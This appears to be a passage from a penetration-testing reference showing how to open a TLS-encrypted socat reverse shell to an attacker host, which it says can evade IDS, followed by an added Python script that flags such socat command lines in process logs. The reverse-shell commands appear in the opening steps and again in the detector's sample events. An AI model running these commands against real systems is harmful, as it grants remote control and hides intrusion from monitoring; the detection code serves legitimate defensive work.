socat can make encrypted connections, which foil after-the-fact network analysis and may circumvent IDS entirely.

# Generate a self-signed certificate.
#
openssl req -newkey rsa:2048 -nodes \
            -keyout shell.key -x509 -days 362 \
            -out shell.crt
 
# Create a PEM file combining the certificate and key.
#
cat shell.key shell.crt > shell.pem
 
# Start a listener.
#
socat OPENSSL-LISTEN:$LISTENER_PORT,cert=shell.pem,verify=0 -
 
# Start the reverse shell on the target.
#
socat OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 EXEC:"/bin/bash -li"

The verify=0 option turns off certificate validation, so this isn’t a “secure” connection in the sense of being authenticated, but it is secure in the sense of being encrypted.
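Encrypting the channel does not hide the process command line on the host where socat runs. The following is an added example, not part of the original page: it checks logged command lines for the socat pattern shown above (a TLS address paired with EXEC, verify=0, a shell as the child). The sample events, the reason labels, and the extra address keywords beyond those on this page are assumptions.

```python
import re
import shlex

# socat address keywords are case-insensitive. OPENSSL, OPENSSL-LISTEN and EXEC
# are the forms on this page; the other keywords are assumed variants to watch.
TLS_ADDR = re.compile(r"^(openssl(-connect|-listen)?|ssl(-l)?):", re.I)
EXEC_ADDR = re.compile(r"^(exec|system):", re.I)
NO_VERIFY = re.compile(r",verify=0(,|$)", re.I)
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def findings(cmdline):
    """Return reasons a logged command line looks like a TLS-wrapped shell."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quote, e.g. a truncated log field
        argv = cmdline.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "socat":
        return []
    tls = [a for a in argv[1:] if TLS_ADDR.match(a)]
    exe = [a for a in argv[1:] if EXEC_ADDR.match(a)]
    reasons = []
    if tls and exe:
        reasons.append("tls-to-exec")
    if any(NO_VERIFY.search(a) for a in tls):
        reasons.append("peer-cert-unverified")
    # First word of the EXEC/SYSTEM command, before any socat options.
    progs = [a.split(":", 1)[1].split(",", 1)[0].split()[:1] for a in exe]
    if any(p and p[0].rsplit("/", 1)[-1] in SHELLS for p in progs):
        reasons.append("shell-child")
    return reasons


# Constructed sample process-execution records: (host, user, command line).
SAMPLE_EVENTS = [
    ("web01", "www-data", 'socat OPENSSL:203.0.113.10:4443,verify=0 EXEC:"/bin/bash -li"'),
    ("web02", "deploy", "/usr/bin/socat -d -d openssl:198.51.100.7:443,verify=0 system:'sh -i'"),
    ("lb01", "root", "socat TCP-LISTEN:8080,fork TCP:10.0.0.5:80"),
    ("ops01", "alice", "socat OPENSSL-LISTEN:4443,cert=shell.pem,verify=0 -"),
]


def triage(events):
    return [(h, u, r) for h, u, c in events if (r := findings(c))]


if __name__ == "__main__":
    for host, user, reasons in triage(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(reasons)}")
```

The plain TCP port forward on lb01 produces no finding, so ordinary socat relays are not flagged; only the TLS, verify=0 and shell-child indicators are.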